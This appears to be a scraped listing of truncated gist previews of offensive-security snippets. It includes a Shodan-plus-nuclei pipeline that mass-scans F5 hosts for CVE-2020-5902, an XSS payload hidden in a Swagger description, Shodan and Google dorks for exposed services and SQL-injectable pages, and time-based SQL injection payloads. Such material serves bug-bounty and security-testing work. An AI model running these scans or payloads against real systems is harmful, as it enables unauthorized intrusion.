This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(() => { | |
let gadgets = []; | |
if (typeof _satellite !== 'undefined') { | |
gadgets.push('Adobe Dynamic Tag Management'); | |
} | |
if (typeof BOOMR !== 'undefined') { | |
gadgets.push('Akamai Boomerang'); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570 | |
python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt | |
cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt | |
cut -d" " -f3 results.txt > targets.txt | |
sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace | |
interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
title: XSS yaml.spec | |
description: | | |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(document.domain)'>"> | |
paths: | |
/accounts: | |
get: | |
responses: | |
'200': |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# !/usr/bin/env python | |
# sslChainDeetz.py | |
# | |
# Dependencies: | |
# - shodan | |
# - pyOpenSSL | |
# | |
# Installation: | |
# sudo easy_install shodan | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
org: org_name | |
kibana content-length:217 | |
org:”Amazon” ssl:”target” | |
ssl:”target” | |
html:”Dashboard Jenkins” http.component:”jenkins” | |
http.title:”302 Found” | |
http.component%3A”java” | |
https://www.shodan.io/host/ip#9200 | |
https://www.shodan.io/host/ip | |
X-Redirect-By: WordPress ssl:”name” |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
***** Auto-finder by dorks tool with Google API & Bing API ***** | |
@author: z0rtecx | |
@release date: dec-2014 | |
@version: 1.0.12122014 | |
@poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id=" | |
@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors. | |
@features: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
AND sleep(20)# | |
'%2b(select*from(select(sleep(20)))a)%2b' | |
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import json | |
from urllib.parse import quote, quote_plus | |
import sys | |
import os | |
import argparse | |
parser = argparse.ArgumentParser( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://www.editpad.org/tool/extract-text-from-image |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent |